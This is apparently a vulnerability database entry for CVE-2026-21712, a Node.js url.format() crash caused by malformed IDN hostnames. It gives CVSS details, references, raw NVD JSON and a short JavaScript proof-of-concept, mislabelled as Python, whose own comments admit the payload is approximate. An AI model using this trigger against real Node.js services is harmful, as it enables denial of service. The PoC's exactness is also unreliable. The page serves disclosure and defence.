CVE-2026-21712

Description

A flaw in Node.js URL processing causes an assertion failure in native code when `url.format()` is called with a malformed internationalized domain name (IDN) containing invalid characters, crashing the Node.js process.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Node.js (具体受影响版本请参考官方2026年3月安全发布版)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-21712
// This script demonstrates triggering the crash via malformed IDN

const url = require('url');

// Malformed IDN with invalid characters
// The exact payload may vary, but involves invalid Unicode in hostname
const maliciousUrl = {
    protocol: 'https:',
    hostname: 'xn--' + '\ufffd'.repeat(10) + '.example.com'
};

console.log('Attempting to format URL...');

try {
    // This call triggers the assertion failure in vulnerable versions
    const formatted = url.format(maliciousUrl);
    console.log('URL formatted successfully:', formatted);
} catch (err) {
    console.error('Caught JS exception:', err);
}

// In vulnerable versions, the process crashes before catch block or exit

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21712
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21712
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21712/
[4] VulDB https://vuldb.com/cve/CVE-2026-21712
[5] https://hackerone.com/reports/3546390
[6] https://nodejs.org/en/blog/vulnerability/march-2026-security-releases

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21712", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:03.510", "lastModified": "2026-05-10T14:16:47.377", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw in Node.js URL processing causes an assertion failure in native code when `url.format()` is called with a malformed internationalized domain name (IDN) containing invalid characters, crashing the Node.js process."}, {"lang": "es", "value": "Una falla en el procesamiento de URL de Node.js causa una falla de aserción en código nativo cuando se llama a 'url.format()' con un nombre de dominio internacionalizado (IDN) malformado que contiene caracteres no válidos, colapsando el proceso de Node.js."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://hackerone.com/reports/3546390", "source": "[email protected]"}, {"url": "https://nodejs.org/en/blog/vulnerability/march-2026-security-releases", "source": "[email protected]"}]}}